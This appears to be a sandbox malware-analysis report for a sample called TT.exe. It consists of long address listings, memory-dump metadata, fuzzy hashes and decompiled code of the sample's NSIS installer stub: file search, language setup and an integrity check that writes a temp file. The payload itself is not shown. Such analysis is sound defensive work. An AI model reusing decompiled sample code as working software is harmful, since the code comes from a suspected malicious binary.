                                                0x004070f9
                                                0x004070fa
                                                0x004070fc
                                                0x004070fe
                                                0x00407101
                                                0x00000000
                                                0x00407101
                                                0x00407093
                                                0x00407099
                                                0x0040709c
                                                0x0040709f
                                                0x004070a2
                                                0x004070a5
                                                0x004070a8
                                                0x004070ab
                                                0x004070ae
                                                0x004070b1
                                                0x004070b4
                                                0x004070cd
                                                0x004070d0
                                                0x004070d3
                                                0x004070d6
                                                0x004070da
                                                0x004070dc
                                                0x004070dc
                                                0x004070dd
                                                0x004070e0
                                                0x004070b6
                                                0x004070b6
                                                0x004070be
                                                0x004070c3
                                                0x004070c5
                                                0x004070c8
                                                0x004070c8
                                                0x004070e3
                                                0x004070ea
                                                0x00000000
                                                0x004070ec
                                                0x00000000
                                                0x004070ec
                                                0x00000000
                                                0x00406d88
                                                0x00406d8b
                                                0x00406dc1
                                                0x00406ef1
                                                0x00406ef1
                                                0x00406ef1
                                                0x00406ef1
                                                0x00406ef4
                                                0x00406ef4
                                                0x00406ef7
                                                0x00406ef9
                                                0x00407183
                                                0x00000000
                                                0x00407183
                                                0x00406eff
                                                0x00406f02
                                                0x00000000
                                                0x00000000
                                                0x00406f08
                                                0x00406f0c
                                                0x00406f0f
                                                0x00406f0f
                                                0x00406f0f
                                                0x00000000
                                                0x00406f0f
                                                0x00406d8d
                                                0x00406d8f
                                                0x00406d91
                                                0x00406d93
                                                0x00406d96
                                                0x00406d97
                                                0x00406d99
                                                0x00406d9b
                                                0x00406d9e
                                                0x00406da1
                                                0x00406db7
                                                0x00406dbc
                                                0x00406df4
                                                0x00406df4
                                                0x00406df8
                                                0x00406e24
                                                0x00406e26
                                                0x00406e2d
                                                0x00406e30
                                                0x00406e33
                                                0x00406e33
                                                0x00406e38
                                                0x00406e38
                                                0x00406e3a
                                                0x00406e3d
                                                0x00406e44
                                                0x00406e47
                                                0x00406e74
                                                0x00406e74
                                                0x00406e77
                                                0x00406e7a
                                                0x00406eee
                                                0x00406eee
                                                0x00406eee
                                                0x00000000
                                                0x00406eee
                                                0x00406e7c
                                                0x00406e82
                                                0x00406e85
                                                0x00406e88
                                                0x00406e8b
                                                0x00406e8e
                                                0x00406e91
                                                0x00406e94
                                                0x00406e97
                                                0x00406e9a
                                                0x00406e9d
                                                0x00406eb6
                                                0x00406eb8
                                                0x00406ebb
                                                0x00406ebc
                                                0x00406ebf
                                                0x00406ec1
                                                0x00406ec4
                                                0x00406ec6
                                                0x00406ec8
                                                0x00406ecb
                                                0x00406ecd
                                                0x00406ed0
                                                0x00406ed4
                                                0x00406ed6
                                                0x00406ed6
                                                0x00406ed7
                                                0x00406eda
                                                0x00406edd
                                                0x00406e9f
                                                0x00406e9f
                                                0x00406ea7
                                                0x00406eac
                                                0x00406eae
                                                0x00406eb1
                                                0x00406eb1
                                                0x00406ee0
                                                0x00406ee7
                                                0x00406e71
                                                0x00406e71
                                                0x00406e71
                                                0x00406e71
                                                0x00000000
                                                0x00406ee9
                                                0x00000000
                                                0x00406ee9
                                                0x00406ee7
                                                0x00406dfa
                                                0x00406dfd
                                                0x00406dff
                                                0x00406e02
                                                0x00406e05
                                                0x00406e08
                                                0x00406e0a
                                                0x00406e0d
                                                0x00406e10
                                                0x00406e10
                                                0x00406e13
                                                0x00406e13
                                                0x00406e16
                                                0x00406e1d
                                                0x00406df1
                                                0x00406df1
                                                0x00406df1
                                                0x00406df1
                                                0x00000000
                                                0x00406e1f
                                                0x00000000
                                                0x00406e1f
                                                0x00406e1d
                                                0x00406da3
                                                0x00406da6
                                                0x00406da8
                                                0x00406dab
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406c95
                                                0x00406c95
                                                0x00406c99
                                                0x0040715f
                                                0x00000000
                                                0x0040715f
                                                0x00406c9f
                                                0x00406ca2
                                                0x00406ca5
                                                0x00406ca8
                                                0x00406caa
                                                0x00406caa
                                                0x00406caa
                                                0x00406cad
                                                0x00406cb0
                                                0x00406cb3
                                                0x00406cb6
                                                0x00406cb9
                                                0x00406cbc
                                                0x00406cbd
                                                0x00406cbf
                                                0x00406cbf
                                                0x00406cbf
                                                0x00406cc2
                                                0x00406cc5
                                                0x00406cc8
                                                0x00406ccb
                                                0x00406ccb
                                                0x00406ccb
                                                0x00406cce
                                                0x00000000
                                                0x00000000
                                                0x00406f12
                                                0x00406f12
                                                0x00406f12
                                                0x00406f16
                                                0x00000000
                                                0x00000000
                                                0x00406f1c
                                                0x00406f1f
                                                0x00406f22
                                                0x00406f25
                                                0x00406f27
                                                0x00406f27
                                                0x00406f27
                                                0x00406f2a
                                                0x00406f2d
                                                0x00406f30
                                                0x00406f33
                                                0x00406f36
                                                0x00406f39
                                                0x00406f3a
                                                0x00406f3c
                                                0x00406f3c
                                                0x00406f3c
                                                0x00406f3f
                                                0x00406f42
                                                0x00406f45
                                                0x00406f48
                                                0x00406f4b
                                                0x00406f4f
                                                0x00406f51
                                                0x00406f54
                                                0x00000000
                                                0x00406f56
                                                0x00000000
                                                0x00406f56
                                                0x00406f54
                                                0x00407189
                                                0x00000000
                                                0x00000000
                                                0x004067b8

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 69107d409a21aceab355f2bdda7f7152adad7d75b4471f7616c4440fbc630a2e
                                                • Instruction ID: 6d311f2402807b87ac493386ce59d8e56409eb9bb3693b5a24021ea98ba03221
                                                • Opcode Fuzzy Hash: 69107d409a21aceab355f2bdda7f7152adad7d75b4471f7616c4440fbc630a2e
                                                • Instruction Fuzzy Hash: 3AF18571D04229CBDF28CFA8C8946ADBBB1FF44305F25816ED456BB281D3786A86CF45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040659C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0040659C(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4225a0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4225a0;
			}




                                                0x004065a7
                                                0x004065b0
                                                0x00000000
                                                0x004065bd
                                                0x004065b3
                                                0x00000000

                                                APIs
                                                • FindFirstFileA.KERNELBASE(747DFA90,004225A0,C:\Users\user\AppData\Local\Temp\nse2C42.tmp,00405CF1,C:\Users\user\AppData\Local\Temp\nse2C42.tmp,C:\Users\user\AppData\Local\Temp\nse2C42.tmp,00000000,C:\Users\user\AppData\Local\Temp\nse2C42.tmp,C:\Users\user\AppData\Local\Temp\nse2C42.tmp,747DFA90,?,747DF560,00405A10,?,747DFA90,747DF560), ref: 004065A7
                                                • FindClose.KERNEL32(00000000), ref: 004065B3
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\nse2C42.tmp, xrefs: 0040659C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID: C:\Users\user\AppData\Local\Temp\nse2C42.tmp
                                                • API String ID: 2295610775-3182895846
                                                • Opcode ID: a8a8e6ca181c7703a692eace486e77433675a7c42b8a8fe2eb47bb99df7a0189
                                                • Instruction ID: f69e928bf0ac745f57f8f0961b1e49234d8ba52852923c3f30ba08d6865e50e3
                                                • Opcode Fuzzy Hash: a8a8e6ca181c7703a692eace486e77433675a7c42b8a8fe2eb47bb99df7a0189
                                                • Instruction Fuzzy Hash: 64D01231615130FBC3411B38BE0C84B7A5C9F093303619B36F466F12E4D7748D62869C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00403A3B, Relevance: 51.0, APIs: 14, Strings: 15, Instructions: 215stringregistryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 96%
                                                			E00403A3B(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				intOrPtr _t36;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				signed short _t67;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x424754;
				_t17 = E00406631(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x420d50;
					"1033" = 0x30;
					 *0x42b001 = 0x78;
					 *0x42b002 = 0;
					E0040610F(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420d50, 0);
					__eflags =  *0x420d50;
					if(__eflags == 0) {
						E0040610F(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x420d50, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					_t67 =  *_t17(); // executed
					E00406186("1033", _t67 & 0x0000ffff);
				}
				E00403D00(_t71, _t84);
				_t80 = "C:\\Users\\engineer\\AppData\\Local\\Temp";
				 *0x4247e0 =  *0x42475c & 0x00000020;
				 *0x4247fc = 0x10000;
				if(E00405CAE(_t84, "C:\\Users\\engineer\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405CAE(_t92, _t80) == 0) {
						E004062BB(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118)));
					}
					_t25 = LoadImageA( *0x424740, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423f28 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403D00(_t71, __eflags);
							__eflags =  *0x424800;
							if( *0x424800 != 0) {
								_t28 = E00405421(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x423f0c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420d30, 5);
							_t34 = E004065C3("RichEd20");
							__eflags = _t34;
							if(_t34 == 0) {
								E004065C3("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x423ee0);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423ee0);
								 *0x423f04 = _t81;
								RegisterClassA(0x423ee0);
							}
							_t36 =  *0x423f20; // 0x0
							_t39 = DialogBoxParamA( *0x424740, _t36 + 0x00000069 & 0x0000ffff, 0, E00403DD8, 0);
							E0040398B(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x424740;
						 *0x423ee4 = E00401000;
						 *0x423ef0 =  *0x424740;
						 *0x423ef4 = _t25;
						 *0x423f04 = 0x40a210;
						if(RegisterClassA(0x423ee0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x420d30 = CreateWindowExA(0x80, 0x40a210, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x424740, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					_t86 = _t71;
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x4236e0;
					E0040610F(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x424798, 0x4236e0, 0);
					_t57 =  *0x4236e0; // 0x75
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x4236e1;
						 *((char*)(E00405BEB(0x4236e1, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E00406228(_t80, E00405BC0(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E00405C07(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}


























                                                0x00403a41
                                                0x00403a4a
                                                0x00403a51
                                                0x00403a53
                                                0x00403a67
                                                0x00403a79
                                                0x00403a80
                                                0x00403a87
                                                0x00403a8d
                                                0x00403a92
                                                0x00403a98
                                                0x00403aab
                                                0x00403aab
                                                0x00403ab6
                                                0x00403a55
                                                0x00403a55
                                                0x00403a60
                                                0x00403a60
                                                0x00403abb
                                                0x00403ac5
                                                0x00403ace
                                                0x00403ad3
                                                0x00403ae4
                                                0x00403b6b
                                                0x00403b73
                                                0x00403b7c
                                                0x00403b7c
                                                0x00403b92
                                                0x00403b98
                                                0x00403ba6
                                                0x00403c27
                                                0x00403c2f
                                                0x00403c39
                                                0x00403c3e
                                                0x00403c44
                                                0x00403cce
                                                0x00403cd3
                                                0x00403cd5
                                                0x00403cf1
                                                0x00000000
                                                0x00403cf1
                                                0x00403cd7
                                                0x00403cdd
                                                0x00403ce5
                                                0x00403ce5
                                                0x00000000
                                                0x00403cdd
                                                0x00403c52
                                                0x00403c5d
                                                0x00403c62
                                                0x00403c64
                                                0x00403c6b
                                                0x00403c6b
                                                0x00403c76
                                                0x00403c7e
                                                0x00403c80
                                                0x00403c82
                                                0x00403c8b
                                                0x00403c8e
                                                0x00403c94
                                                0x00403c94
                                                0x00403c9a
                                                0x00403cb3
                                                0x00403cc4
                                                0x00000000
                                                0x00403cc9
                                                0x00403c31
                                                0x00403c33
                                                0x00000000
                                                0x00403ba8
                                                0x00403ba8
                                                0x00403bb4
                                                0x00403bbe
                                                0x00403bc4
                                                0x00403bc9
                                                0x00403bd8
                                                0x00403cf6
                                                0x00403cf6
                                                0x00000000
                                                0x00403cf6
                                                0x00403be7
                                                0x00403c22
                                                0x00000000
                                                0x00403c22
                                                0x00403aea
                                                0x00403aea
                                                0x00403aed
                                                0x00403aef
                                                0x00000000
                                                0x00000000
                                                0x00403af9
                                                0x00403b09
                                                0x00403b0e
                                                0x00403b15
                                                0x00000000
                                                0x00000000
                                                0x00403b19
                                                0x00403b1b
                                                0x00403b28
                                                0x00403b28
                                                0x00403b30
                                                0x00403b36
                                                0x00403b5e
                                                0x00403b66
                                                0x00000000
                                                0x00403b48
                                                0x00403b49
                                                0x00403b52
                                                0x00403b58
                                                0x00403b59
                                                0x00000000
                                                0x00403b59
                                                0x00403b54
                                                0x00403b56
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403b56
                                                0x00403b36

                                                APIs
                                                  • Part of subcall function 00406631: GetModuleHandleA.KERNEL32(?,?,?,004034D4,0000000B), ref: 00406643
                                                  • Part of subcall function 00406631: GetProcAddress.KERNEL32(00000000,?), ref: 0040665E
                                                • GetUserDefaultUILanguage.KERNELBASE(00000002,747DFA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TT.exe" ,00000000), ref: 00403A55
                                                  • Part of subcall function 00406186: wsprintfA.USER32 ref: 00406193
                                                • lstrcatA.KERNEL32(1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000,00000002,747DFA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TT.exe" ,00000000), ref: 00403AB6
                                                • lstrlenA.KERNEL32(uvlcopdlxoed,?,?,?,uvlcopdlxoed,00000000,C:\Users\user\AppData\Local\Temp,1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000,00000002,747DFA90), ref: 00403B2B
                                                • lstrcmpiA.KERNEL32(?,.exe,uvlcopdlxoed,?,?,?,uvlcopdlxoed,00000000,C:\Users\user\AppData\Local\Temp,1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000), ref: 00403B3E
                                                • GetFileAttributesA.KERNEL32(uvlcopdlxoed), ref: 00403B49
                                                • LoadImageA.USER32 ref: 00403B92
                                                • RegisterClassA.USER32 ref: 00403BCF
                                                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403BE7
                                                • CreateWindowExA.USER32 ref: 00403C1C
                                                • ShowWindow.USER32(00000005,00000000), ref: 00403C52
                                                • GetClassInfoA.USER32 ref: 00403C7E
                                                • GetClassInfoA.USER32 ref: 00403C8B
                                                • RegisterClassA.USER32 ref: 00403C94
                                                • DialogBoxParamA.USER32 ref: 00403CB3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: "C:\Users\user\Desktop\TT.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$PB$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$uvlcopdlxoed$>B
                                                • API String ID: 606308-2132419383
                                                • Opcode ID: 8cd03706bc3b4e3cd0d6d37f96b9a73a5a3b7a5ac7853bf60a8ad06bd9737550
                                                • Instruction ID: 0b0e7d8dfe967f47b98d7fa3c12120eb495d8fa8be153c65172cdb3e572a9271
                                                • Opcode Fuzzy Hash: 8cd03706bc3b4e3cd0d6d37f96b9a73a5a3b7a5ac7853bf60a8ad06bd9737550
                                                • Instruction Fuzzy Hash: A061C4702046046EE620AF65AD46F3B3A7CEB8574AF40443FF951B62D3CB7D99068A2D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402EF1, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 204memoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 96%
                                                			E00402EF1(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				signed int _t54;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				long _t94;
				signed int _t102;
				signed int _t104;
				void* _t106;
				signed int _t107;
				signed int _t110;
				intOrPtr* _t111;

				_t94 = 0;
				_v8 = 0;
				_v12 = 0;
				 *0x424750 = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\engineer\\Desktop\\TT.exe", 0x400);
				_t106 = E00405DC1("C:\\Users\\engineer\\Desktop\\TT.exe", 0x80000000, 3);
				 *0x40a018 = _t106;
				if(_t106 == 0xffffffff) {
					return "Error launching installer";
				}
				E00406228("C:\\Users\\engineer\\Desktop", "C:\\Users\\engineer\\Desktop\\TT.exe");
				E00406228(0x42c000, E00405C07("C:\\Users\\engineer\\Desktop"));
				_t54 = GetFileSize(_t106, 0);
				__eflags = _t54;
				 *0x41f908 = _t54;
				_t110 = _t54;
				if(_t54 <= 0) {
					L24:
					E00402E52(1);
					__eflags =  *0x424758 - _t94;
					if( *0x424758 == _t94) {
						goto L32;
					}
					__eflags = _v12 - _t94;
					if(_v12 == _t94) {
						L28:
						_t111 = GlobalAlloc(0x40, _v20);
						E00406756(0x40b870);
						E00405DF0( &_v300, "C:\\Users\\engineer\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E00403419( *0x424758 + 0x1c);
							 *0x41f90c = _t65;
							 *0x41f900 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00403192(_v16, 0xffffffff, _t94, _t111, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x424754 = _t111;
								 *0x42475c =  *_t111;
								if((_v40 & 0x00000001) != 0) {
									 *0x424760 =  *0x424760 + 1;
									__eflags =  *0x424760;
								}
								_t45 = _t111 + 0x44; // 0x44
								_t70 = _t45;
								_t102 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t111;
									_t102 = _t102 - 1;
									__eflags = _t102;
								} while (_t102 != 0);
								_t71 =  *0x41f8fc; // 0x310ae
								 *((intOrPtr*)(_t111 + 0x3c)) = _t71;
								E00405D7C(0x424780, _t111 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L32;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E00403419( *0x41f8f8);
					_t77 = E00403403( &_a4, 4);
					__eflags = _t77;
					if(_t77 == 0) {
						goto L32;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L32;
					}
					goto L28;
				} else {
					do {
						_t107 = _t110;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x424758) & 0x00007e00) + 0x200;
						__eflags = _t110 - _t82;
						if(_t110 >= _t82) {
							_t107 = _t82;
						}
						_t83 = E00403403(0x4178f8, _t107);
						__eflags = _t83;
						if(_t83 == 0) {
							E00402E52(1);
							L32:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x424758;
						if( *0x424758 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402E52(0);
							}
							goto L20;
						}
						E00405D7C( &_v40, 0x4178f8, 0x1c);
						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t89;
						_t104 =  *0x41f8f8; // 0x0
						 *0x424800 =  *0x424800 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t110;
						 *0x424758 = _t104;
						if(_t92 > _t110) {
							goto L32;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v12 = _v12 + 1;
							_t110 = _t92 - 4;
							__eflags = _t107 - _t110;
							if(_t107 > _t110) {
								_t107 = _t110;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t110 -  *0x41f908; // 0xbce
						if(__eflags < 0) {
							_v8 = E004066E8(_v8, 0x4178f8, _t107);
						}
						 *0x41f8f8 =  *0x41f8f8 + _t107;
						_t110 = _t110 - _t107;
						__eflags = _t110;
					} while (_t110 != 0);
					_t94 = 0;
					__eflags = 0;
					goto L24;
				}
			}































                                                0x00402efc
                                                0x00402eff
                                                0x00402f02
                                                0x00402f1c
                                                0x00402f21
                                                0x00402f34
                                                0x00402f39
                                                0x00402f3f
                                                0x00000000
                                                0x00402f41
                                                0x00402f52
                                                0x00402f63
                                                0x00402f6a
                                                0x00402f70
                                                0x00402f72
                                                0x00402f77
                                                0x00402f79
                                                0x00403064
                                                0x00403066
                                                0x0040306b
                                                0x00403072
                                                0x00000000
                                                0x00000000
                                                0x00403078
                                                0x0040307b
                                                0x004030a7
                                                0x004030b7
                                                0x004030b9
                                                0x004030ca
                                                0x004030e5
                                                0x004030eb
                                                0x004030ee
                                                0x004030f3
                                                0x00403112
                                                0x00403122
                                                0x00403134
                                                0x00403139
                                                0x0040313e
                                                0x00403141
                                                0x0040314a
                                                0x0040314e
                                                0x00403156
                                                0x0040315b
                                                0x0040315d
                                                0x0040315d
                                                0x0040315d
                                                0x00403165
                                                0x00403165
                                                0x00403168
                                                0x00403169
                                                0x00403169
                                                0x0040316c
                                                0x0040316e
                                                0x0040316e
                                                0x0040316e
                                                0x00403171
                                                0x00403178
                                                0x00403184
                                                0x00403189
                                                0x00000000
                                                0x00403189
                                                0x00000000
                                                0x00403141
                                                0x00000000
                                                0x004030f5
                                                0x00403083
                                                0x0040308e
                                                0x00403093
                                                0x00403095
                                                0x00000000
                                                0x00000000
                                                0x0040309e
                                                0x004030a1
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00402f7f
                                                0x00402f84
                                                0x00402f89
                                                0x00402f8d
                                                0x00402f94
                                                0x00402f99
                                                0x00402f9b
                                                0x00402f9d
                                                0x00402f9d
                                                0x00402fa1
                                                0x00402fa6
                                                0x00402fa8
                                                0x00403101
                                                0x00403143
                                                0x00000000
                                                0x00403143
                                                0x00402fae
                                                0x00402fb5
                                                0x00403031
                                                0x00403035
                                                0x00403039
                                                0x0040303e
                                                0x00000000
                                                0x00403035
                                                0x00402fbe
                                                0x00402fc3
                                                0x00402fc6
                                                0x00402fcb
                                                0x00000000
                                                0x00000000
                                                0x00402fcd
                                                0x00402fd4
                                                0x00000000
                                                0x00000000
                                                0x00402fd6
                                                0x00402fdd
                                                0x00000000
                                                0x00000000
                                                0x00402fdf
                                                0x00402fe6
                                                0x00000000
                                                0x00000000
                                                0x00402fe8
                                                0x00402fef
                                                0x00000000
                                                0x00000000
                                                0x00402ff1
                                                0x00402ff7
                                                0x00403000
                                                0x00403006
                                                0x00403009
                                                0x0040300b
                                                0x00403011
                                                0x00000000
                                                0x00000000
                                                0x00403017
                                                0x0040301b
                                                0x00403023
                                                0x00403023
                                                0x00403026
                                                0x00403029
                                                0x0040302b
                                                0x0040302d
                                                0x0040302d
                                                0x00000000
                                                0x0040302b
                                                0x0040301d
                                                0x00403021
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040303f
                                                0x0040303f
                                                0x00403045
                                                0x00403051
                                                0x00403051
                                                0x00403054
                                                0x0040305a
                                                0x0040305a
                                                0x0040305a
                                                0x00403062
                                                0x00403062
                                                0x00000000
                                                0x00403062

                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00402F05
                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\TT.exe,00000400), ref: 00402F21
                                                  • Part of subcall function 00405DC1: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\TT.exe,80000000,00000003), ref: 00405DC5
                                                  • Part of subcall function 00405DC1: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405DE7
                                                • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\TT.exe,C:\Users\user\Desktop\TT.exe,80000000,00000003), ref: 00402F6A
                                                • GlobalAlloc.KERNEL32(00000040,0040A130), ref: 004030AC
                                                Strings
                                                • Error launching installer, xrefs: 00402F41
                                                • soft, xrefs: 00402FDF
                                                • C:\Users\user\Desktop, xrefs: 00402F4C, 00402F51, 00402F57
                                                • "C:\Users\user\Desktop\TT.exe" , xrefs: 00402EF1
                                                • C:\Users\user\Desktop\TT.exe, xrefs: 00402F0B, 00402F1A, 00402F2E, 00402F4B
                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403143
                                                • Null, xrefs: 00402FE8
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00402EFB, 004030C4
                                                • Inst, xrefs: 00402FD6
